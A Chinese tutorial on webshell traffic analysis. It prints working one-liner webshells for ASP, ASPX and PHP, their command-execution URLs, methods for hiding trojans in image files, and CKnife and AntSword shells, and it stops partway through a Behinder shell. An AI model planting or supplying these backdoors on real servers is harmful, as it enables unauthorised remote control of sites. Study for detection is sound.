Webshell流量分析

Webshell流量分析

常见的一句话木马:

asp一句话 <%eval request("pass")%>
aspx一句话 <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
php一句话 <?php @eval($_POST["pass"]);?>

什么是Webshell

  • Webshell看起来和普通的服务端脚本一样,看起来就像普通的代码。
  • Webshell对本地资源具备一定的操作能力,其操作本地资源的范围取决于解析器的权限。
# webshell: 1.php
<?php echo system($_GET["cmd"]);?>
# 利用方式 
http://ip:port/hackable/uploads/1.php?cmd=ls

# webshell: 2.php
<?php eval($_GET["cmd"]);?>
# 利用方式
http://ip:port/hackable/uploads/2.php?cmd=phpinfo();

#  webshell: 3.php
<?php include "shell.jpg";?>
# 利用方式
# 上传shell.jpg到同一目录,其中包含代码<?php phpinfo();?>
# 文件也可以是shell.jsp、shell.txt
http://ip:port/hackable/uploads/3.php

Webshell恶意函数

fwrite:写入文件(可安全用于二进制文件)。
eval:把字符串作为PHP代码执行。
exec:执行一个外部程序。
system:执行外部程序,并且显示输出。
stripslashes:反引用一个引用字符串。
inflate:inflate方法的主要作用就是将xml转换成一个View对象,用于动态的创建布局。
gzinflate:gzinflate(),gzdeflate()是压缩与解压缩算法。
passthru:执行外部程序并且显示原始输出。
move_uploaded_file:将上传的文件移动到新位置。
phpinfo:输出关于 PHP 配置的信息。

图片马制作方式

copy命令:

CMD命令:copy 1.jpg/b+1.php/a 2.jpg

PS软件:

PS打开图片,在文件—>文件简介里插入需要的木马代码,最后:文件—>保存【保存:覆盖原文件,也可以另存为其他格式】。

edjpg软件:

将图片直接拖到edjpg.exe上,在弹出窗口内输入一句话木马即可。

十六进制编辑器:

用010 Editor或winhex等十六进制编辑器打开图片,将一句话木马插入到右边最底层或最上层后保存。

Webshell流量分析

CKnife 菜刀

Webshell代码:

# npc.php
<?php eval($_POST["npc"]);?>

流量特征:

  • 明文传输。
  • npc是php一句话木马的password。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Antsword 蚁剑

Webshell代码:

# 4.jsp<%!
class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}
}
%>
<%
String cls=request.getParameter("ant");
if(cls!=null){new U(this.getClass().getClassLoader()).g(new sun.misc.BASE64Decoder().decodeBuffer(cls)).newInstance().equals(pageContext);
}
%>

流量特征:

  • 明文传输。
  • ant是jsp一句话木马的password。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

Behinder 冰蝎2

Webshell代码:

# behinder.php,密码pass<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{$key

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/229958.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

全球市场:跨境电商消费者权益维权的趋势

全球市场:跨境电商消费者权益维权的趋势

随着数字技术的迅猛发展&#xff0c;跨境电商逐渐成为全球贸易的引领者&#xff0c;但与此同时&#xff0c;消费者权益维权问题也备受关注。本文将深入探讨跨境电商消费者权益维权的趋势&#xff0c;剖析全球市场中涌现的挑战和解决方案&#xff0c;以期为构建更加公平、透明的…
阅读更多...
Sectigo通配符证书

Sectigo通配符证书

Sectigo通配符证书&#xff08;Wildcard SSL Certificate&#xff09;是一种特殊类型的SSL证书&#xff0c;它适用于一个主域名及其所有子域名。这意味着&#xff0c;只要子域名在主域名下&#xff0c;就可以使用同一张通配符证书进行加密保护。这为拥有多个子域名的网站提供了…
阅读更多...
独家揭秘!8种平面设计类型,你都了解吗?

独家揭秘!8种平面设计类型,你都了解吗?

当我们谈起平面设计时&#xff0c;大部分人可能会误以为平面设计只局限于处理二维&#xff08;2D&#xff09;元素&#xff0c;例如设计logo或海报等。这实际上是一个普遍的误解。事实上&#xff0c;平面设计的定义和应用范围要远远超越这个简单的概念。它更多的是采用各种平面…
阅读更多...
VC++调试QT源码

VC++调试QT源码

环境&#xff1a;vs2017 qt 5.14.2 1&#xff1a;首先我们需要选择我们的源码路径 右键解决方案-》属性-》通用属性-》调试源文件-》在窗口内添加QT下载时的源码**.src文件夹**&#xff0c;这里最好把源码 D:\software\QT\path\5.14.2\Src 源文件里面的Src文件做一个备份出来…
阅读更多...
银行理财知识竞赛活动要怎么策划

银行理财知识竞赛活动要怎么策划

理财知识竞赛是银行单位办得较多的一种知识竞赛&#xff0c;下面用我公司承办的一场中信银行理财知识竞赛来分析一下这类知识竞赛的赛制策划。 本次知识竞赛参赛是队伍为12支&#xff0c;每支队伍4名队员&#xff0c;共计48人参赛。通过四个环节来决出名次。下面介绍四轮比赛环…
阅读更多...
(5h)Unity3D快速入门之Roll-A-Ball游戏开发

(5h)Unity3D快速入门之Roll-A-Ball游戏开发

DAY1&#xff1a;Unity3D安装 链接 DAY2&#xff1a;构建场景&#xff0c;编写代码 链接 内容&#xff1a;WASD前后左右移动、摄像机跟随 DAY3&#xff1a;待更新 DAY4&#xff1a;待更新 DAY5&#xff1a;待更新
阅读更多...
yolov4、yolov5优化策略

yolov4、yolov5优化策略

一、yolov4优化策略 1.Mosaic data augmentation&#xff1a;四张图像拼接成一张进行训练&#xff0c;现在一个batch相当于以前4个batch。 2.Random Erase&#xff1a;用随机值或训练集的平均像素值替换图像的区域。 3.Self-adversarial-training(SAT)&#xff1a;引入噪音点…
阅读更多...
el-table,列表合并,根据名称列名称相同的品名将其它列值相同的进行合并

el-table,列表合并,根据名称列名称相同的品名将其它列值相同的进行合并

el-table,列表合并,根据名称列名称相同的品名讲其它列值相同的进行合并,并且不能垮品名合并 如图 用到el-table合并行的方法合并 tableSpanMethod({ row, column, rowIndex, columnIndex }) {if (column.property "materielName") {//合并商品名const _row this…
阅读更多...
初中古诗文大会填空题的常见题型和阅读专辑的对应知识点分析

初中古诗文大会填空题的常见题型和阅读专辑的对应知识点分析

前面两篇文章&#xff0c;六分成长为您介绍了2023年初中古诗文大会复选&#xff08;复赛&#xff09;单选题和多选题的常见题型和考察点&#xff0c;并且从历年真题和中学生古诗文阅读专辑&#xff08;初中适用&#xff0c;下称《专辑》&#xff09;中各选了一些题目作为示例&a…
阅读更多...
PC端ssh连接到Android手机的Termux部署http服务器

PC端ssh连接到Android手机的Termux部署http服务器

1. 下载并安装Termux至Android手机 Releases termux/termux-app (github.com) https://github.com/termux/termux-app/releases 2. 手机端启动Termux&#xff0c;安装openssh #更新仓库 pkg up pkg install openssh #安装好后&#xff0c;启动sshd sshd问题1&#xff1a;如…
阅读更多...
炸裂:completablefuture自定义线程池慢2倍......比默认线程池......

炸裂:completablefuture自定义线程池慢2倍......比默认线程池......

尼恩说在前面 尼恩社群中&#xff0c;很多小伙伴找尼恩来卷3高技术&#xff0c;学习3高架构&#xff0c;遇到问题&#xff0c;常常找尼恩反馈和帮扶。 周一&#xff0c;一个5年经验的大厂小伙伴&#xff0c;反馈了一个令人震惊的问题 completablefuture自定义线程池慢2倍…比…
阅读更多...
如何让电脑每天定时自动关机?

如何让电脑每天定时自动关机?

如何让电脑每天定时自动关机&#xff1f;电脑已经成为社会生产活动中不可或缺的一种工具&#xff0c;它对于我们每个人都非常的重要&#xff0c;不管是工作、生活还是学习中&#xff0c;我们都需要利用电脑。不过很多小伙伴因为繁忙或者因为其它的事情&#xff0c;导致电脑经常…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023